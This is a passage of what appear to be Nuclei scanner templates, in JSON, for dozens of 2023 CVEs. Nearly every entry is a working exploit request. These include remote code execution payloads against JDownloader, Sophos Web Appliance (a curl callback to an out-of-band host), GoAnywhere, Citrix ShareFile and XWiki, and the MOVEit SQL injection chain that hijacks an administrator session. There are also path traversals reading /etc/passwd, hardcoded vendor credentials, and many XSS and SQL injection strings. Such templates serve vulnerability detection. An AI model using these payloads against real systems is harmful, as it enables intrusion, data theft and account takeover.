(RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: {{base64(\"echo ---------;{{cmd}} 2>&1;echo ---------;\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=([\\d,]+)\\(.*?\\)"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1671","info":{"name":"Sophos Web Appliance - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php?c=blocked&action=continue HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargs_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40example.com&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-23492","info":{"name":"Login with Phone Number - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","message\":\"Update password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-27292","info":{"name":"OpenCATS - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=settings&a=previewPage&url=https://oast.me HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<TITLE>Page Preview</TITLE>","<FRAME src=\"https://oast.me\">"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"threads":30,"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"cookie-reuse":true,"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27034","info":{"name":"Blind SQL injection vulnerability in Jms Blog","severity":"critical"},"requests":[{"raw":["@timeout: 12s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\nHost: {{Hostname}}\nConnection: Keep-alive\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; 